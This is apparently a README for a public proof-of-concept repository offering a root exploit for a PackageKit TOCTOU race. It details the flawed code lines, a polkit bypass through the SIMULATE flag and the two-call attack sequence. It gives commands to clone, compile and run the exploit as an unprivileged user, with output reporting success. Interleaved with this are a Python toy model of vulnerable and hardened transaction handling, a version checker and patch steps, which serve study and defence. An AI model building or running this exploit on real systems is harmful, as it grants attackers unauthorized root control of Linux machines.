Local Privilege Escalation exploit targeting the PackageKit daemon.
Escalates from an unprivileged local user to root through a TOCTOU race condition vulnerability.
CVE-2026-41651 (also known as Pack2TheRoot) is a critical TOCTOU (Time-Of-Check to Time-Of-Use) race condition vulnerability in PackageKit, a system service used by many Linux distributions for package management abstraction.
The vulnerability allows a local unprivileged user to manipulate PackageKit transaction states and bypass authorization checks under specific conditions.
An attacker with local access may be able to:
- Install arbitrary packages with elevated privileges
- Execute package maintainer scripts as root
- Achieve full local privilege escalation
- Bypass expected polkit authorization behavior
| Component | Vulnerable Versions | Fixed Version |
|---|---|---|
| PackageKit | 1.0.2 – 1.3.4 | 1.3.5 |
- Ubuntu 24.04 (Noble Numbat)
- Ubuntu 22.04 (Jammy Jellyfish)
- Debian 12 (Bookworm)
- Kali Linux (latest)
- Other Debian/Ubuntu-based distributions using vulnerable PackageKit versions
The issue originates from multiple logic flaws inside src/pk-transaction.c.
| Bug | Location | Description |
|---|---|---|
| BUG 1 | Line 4036 | InstallFiles() overwrites cached transaction flags and paths without proper state validation |
| BUG 2 | Lines 876–881 | pk_transaction_set_state() silently rejects backward state transitions |
| BUG 3 | Lines 2273–2277 | pk_transaction_run() reads cached flags during dispatch rather than authorization |
| BYPASS | Lines 2893–2900 | SIMULATE flag (0x4) skips polkit authorization checks |
```
Attacker (unprivileged)                       packagekitd (root)
        │                                            │
        ├── 1. InstallFiles(SIMULATE) ──────────────►│ polkit bypassed → state = READY
        │                                            │ queued async dispatch
        │                                            │
        ├── 2. InstallFiles(payload) ───────────────►│ cached flags overwritten
        │                                            │ invalid state transition ignored
        │                                            │
        │            [dispatch occurs]               │ payload processed as root
        │                                            │ maintainer scripts executed
        │                                            │
        └───────────────────────────────────────────►│ privilege escalation achieved
```
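The three flaws in the table, and the order of events in the diagram, are easiest to reason about as a small state machine. The model below is an added teaching example, not PackageKit's code: the class and method names (`VulnerableTransaction`, `HardenedTransaction`, `install_files`, `run`), the state names and the `polkit_check` stand-in are assumptions chosen to mirror the page's description. Only the `SIMULATE` value 0x4 comes from the page. The vulnerable class caches request data before validating state or authorization and dispatches whatever is cached; the hardened class validates state first, authorizes before caching, raises on backward transitions, and dispatches only the snapshot taken at authorization time.

```python
"""Toy model of the transaction-state flaws described above (added example,
not PackageKit source). Names other than SIMULATE are assumptions."""
from enum import IntEnum

SIMULATE = 0x4  # flag value quoted on the page


class State(IntEnum):
    NEW = 0
    READY = 1
    FINISHED = 2


class AuthorizationError(Exception):
    pass


class InvalidTransition(Exception):
    pass


def polkit_check(flags, caller_is_admin):
    """Stand-in for the polkit check: simulate-only requests are waved
    through, anything else requires an admin caller."""
    if flags & SIMULATE:
        return True
    return caller_is_admin


class VulnerableTransaction:
    """Reproduces the three flaws listed in the table (toy model)."""

    def __init__(self):
        self.state = State.NEW
        self.flags = 0
        self.paths = []
        self.queued = False

    def set_state(self, new):
        if new < self.state:          # BUG 2: backward move silently dropped
            return False
        self.state = new
        return True

    def install_files(self, flags, paths, caller_is_admin=False):
        # BUG 1: cache is overwritten before any state or auth validation
        self.flags, self.paths = flags, list(paths)
        if not polkit_check(flags, caller_is_admin):
            self.set_state(State.NEW)  # meant to abort; ignored once READY
            return "denied"
        self.set_state(State.READY)
        self.queued = True
        return "queued"

    def run(self):
        # BUG 3: dispatch trusts what is cached now, not what was authorized
        if self.state != State.READY or not self.queued:
            return None
        self.set_state(State.FINISHED)
        return ("root", self.flags, self.paths)


class HardenedTransaction:
    """Fail-closed variant: check state, then authorize, then cache an
    immutable snapshot; backward transitions are errors, not no-ops."""

    def __init__(self):
        self.state = State.NEW
        self.authorized = None  # (flags, paths) captured at auth time

    def set_state(self, new):
        if new < self.state:
            raise InvalidTransition(f"{self.state.name} -> {new.name}")
        self.state = new

    def install_files(self, flags, paths, caller_is_admin=False):
        if self.state != State.NEW:
            raise InvalidTransition("transaction already committed")
        if not polkit_check(flags, caller_is_admin):
            raise AuthorizationError("polkit denied")
        self.authorized = (flags, tuple(paths))
        self.set_state(State.READY)
        return "queued"

    def run(self):
        if self.state != State.READY:
            return None
        flags, paths = self.authorized
        self.set_state(State.FINISHED)
        return ("root", flags, list(paths))


def demo_vulnerable():
    """Sequence from the diagram against the vulnerable model."""
    t = VulnerableTransaction()
    t.install_files(SIMULATE, ["/tmp/harmless.deb"])       # constructed paths
    second = t.install_files(0, ["/tmp/payload.deb"])
    return second, t.run()


def demo_hardened():
    """Same sequence against the hardened model."""
    t = HardenedTransaction()
    t.install_files(SIMULATE, ["/tmp/harmless.deb"])
    try:
        t.install_files(0, ["/tmp/payload.deb"])
        blocked = False
    except InvalidTransition:
        blocked = True
    return blocked, t.run()
```

In the vulnerable model the second call is reported as denied to its caller, yet dispatch still runs the overwritten payload, which is the TOCTOU gap. In the hardened model the second call is rejected before it can touch the cache, and dispatch only ever sees the data that passed authorization.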
Install required development libraries:

```sh
sudo apt update
sudo apt install libglib2.0-dev
```

Clone and build:

```sh
git clone https://github.com/Lutfifakee-Project/CVE-2026-41651.git
cd CVE-2026-41651
gcc -o exploit CVE-2026-41651.c \
    `pkg-config --cflags --libs glib-2.0 gio-2.0` \
    -Wall
```

Run as an unprivileged user:
```
./exploit
 ______ ______ ___ ___ ___ ____ ___________ _______
/ ___/ | / / __/___|_ |/ _ \|_ |/ __/____/ / < / __// __< /
/ /__ | |/ / _//___/ __// // / __// _ \/___/_ _/ / _ \/__ \/ /
\___/ |___/___/ /____/\___/____/\___/ /_//_/\___/____/_/

CVE-2026-41651 - PackageKit TOCTOU Local Privilege Escalation
═══════════════════════════════════════════════════════════════════
[*] Building packages...
[*] Starting race condition...
[*] Waiting for dispatch...
[*] Polling for payload...
[+] SUCCESS — privilege escalation completed
```
Check the installed PackageKit version:

```sh
pkcon --version
```

Or:

```sh
dpkg -l | grep packagekit
```

- Vulnerable → 1.0.2–1.3.4
- Patched → 1.3.5 or later
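A practitioner checking a fleet will usually feed the `dpkg -l` output above into a script rather than eyeball it. The checker below is an added example, not part of this repository: the `dpkg -l` lines it parses are constructed (the package versions in them are made up), and the function names are my own. It strips the Debian epoch and revision to recover the upstream version, then classifies it against the range the page lists, treating a pre-release of 1.3.5 (a `~` version) conservatively as still vulnerable.

```python
"""Classify Debian/Ubuntu PackageKit versions against the range given above.
Added example; the dpkg -l lines below are constructed, not real output."""
import re

VULN_LOW = (1, 0, 2)     # first vulnerable upstream version (from the page)
VULN_HIGH = (1, 3, 4)    # last vulnerable upstream version (from the page)
FIXED = (1, 3, 5)        # fixed upstream version (from the page)

# Constructed sample in dpkg -l column layout: status, name, version, arch, description
SAMPLE_DPKG_OUTPUT = """\
ii  packagekit                    1.2.8-0example1   amd64  Provides a package management service
ii  packagekit-tools              1.2.8-0example1   amd64  Provides PackageKit command-line tools
ii  libpackagekit-glib2-18:amd64  1.3.5-0example1   amd64  Library for accessing PackageKit
ii  unrelated-package             9.9-1             amd64  Not relevant
"""


def upstream_version(debian_version):
    """Drop an optional epoch ('1:') and the Debian revision after the last '-'."""
    v = debian_version.split(":", 1)[1] if ":" in debian_version else debian_version
    if "-" in v:
        v = v.rsplit("-", 1)[0]
    return v


def version_tuple(upstream):
    """Leading numeric components as a 3-tuple: '1.3.5~rc1' -> (1, 3, 5)."""
    parts = []
    for piece in upstream.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def classify(debian_version):
    """Return 'vulnerable', 'fixed' or 'outside-range-older' for one version."""
    uv = upstream_version(debian_version)
    t = version_tuple(uv)
    prerelease = "~" in uv           # e.g. 1.3.5~rc1 sorts below 1.3.5 in Debian
    if t < VULN_LOW:
        return "outside-range-older"
    if t <= VULN_HIGH or (t == FIXED and prerelease):
        return "vulnerable"
    return "fixed"


def scan_dpkg_listing(text):
    """Map each installed package with 'packagekit' in its name to (version, status)."""
    results = {}
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 3 or cols[0] != "ii":   # only fully installed packages
            continue
        name, version = cols[1], cols[2]
        if "packagekit" in name:
            results[name] = (version, classify(version))
    return results


if __name__ == "__main__":
    for name, (version, status) in scan_dpkg_listing(SAMPLE_DPKG_OUTPUT).items():
        print(f"{name:32} {version:20} {status}")
```

The tuple comparison is a deliberate simplification; for an authoritative ordering of two Debian version strings use `dpkg --compare-versions`, and treat any distribution that backports the fix without bumping the upstream version as a case this check cannot see.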
```sh
sudo apt update
sudo apt upgrade packagekit
```

Official releases:
This repository is provided strictly for:
- Security research
- Defensive security testing
- Educational purposes
- Authorized penetration testing
The author is not responsible for any misuse, illegal activity, or damage caused by this project.
Do not use this software against systems you do not own or have explicit permission to test.